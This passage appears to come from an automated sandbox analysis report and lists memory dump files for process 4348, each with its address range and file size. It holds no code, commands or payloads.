                                                            • memory/4348-81-0x00007FF849920000-0x00007FF849A3A000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/4348-25-0x00007FF849E40000-0x00007FF84A502000-memory.dmp

                                                              Filesize

                                                              6.8MB

                                                            • memory/4348-324-0x000001BCAC890000-0x000001BCACDC3000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/4348-326-0x00007FF84D1A0000-0x00007FF84D1B4000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/4348-353-0x00007FF84CD00000-0x00007FF84CE7F000-memory.dmp

                                                              Filesize

                                                              1.5MB

                                                            • memory/4348-362-0x00007FF849920000-0x00007FF849A3A000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/4348-348-0x00007FF850E50000-0x00007FF850E75000-memory.dmp

                                                              Filesize

                                                              148KB

                                                            • memory/4348-347-0x00007FF849E40000-0x00007FF84A502000-memory.dmp

                                                              Filesize

                                                              6.8MB

                                                            • memory/4348-363-0x00007FF849E40000-0x00007FF84A502000-memory.dmp

                                                              Filesize

                                                              6.8MB

                                                            • memory/4348-388-0x00007FF849A40000-0x00007FF849B0E000-memory.dmp

                                                              Filesize

                                                              824KB

                                                            • memory/4348-401-0x00007FF84D1C0000-0x00007FF84D1F3000-memory.dmp

                                                              Filesize

                                                              204KB

                                                            • memory/4348-389-0x00007FF83DFD0000-0x00007FF83E503000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                            • memory/4348-400-0x00007FF84D780000-0x00007FF84D78D000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/4348-399-0x00007FF84D7B0000-0x00007FF84D7C9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/4348-398-0x00007FF84CD00000-0x00007FF84CE7F000-memory.dmp

                                                              Filesize

                                                              1.5MB

                                                            • memory/4348-397-0x00007FF84D200000-0x00007FF84D224000-memory.dmp

                                                              Filesize

                                                              144KB

                                                            • memory/4348-396-0x00007FF8532C0000-0x00007FF8532D9000-memory.dmp

                                                              Filesize

                                                              100KB

                                                            • memory/4348-395-0x00007FF84D7D0000-0x00007FF84D7FC000-memory.dmp

                                                              Filesize

                                                              176KB

                                                            • memory/4348-394-0x00007FF850E50000-0x00007FF850E75000-memory.dmp

                                                              Filesize

                                                              148KB

                                                            • memory/4348-393-0x00007FF856970000-0x00007FF85697F000-memory.dmp

                                                              Filesize

                                                              60KB

                                                            • memory/4348-404-0x00007FF849920000-0x00007FF849A3A000-memory.dmp

                                                              Filesize

                                                              1.1MB

                                                            • memory/4348-403-0x00007FF84D440000-0x00007FF84D44D000-memory.dmp

                                                              Filesize

                                                              52KB

                                                            • memory/4348-402-0x00007FF84D1A0000-0x00007FF84D1B4000-memory.dmp

                                                              Filesize

                                                              80KB

                                                            • memory/4348-378-0x00007FF849E40000-0x00007FF84A502000-memory.dmp

                                                              Filesize

                                                              6.8MB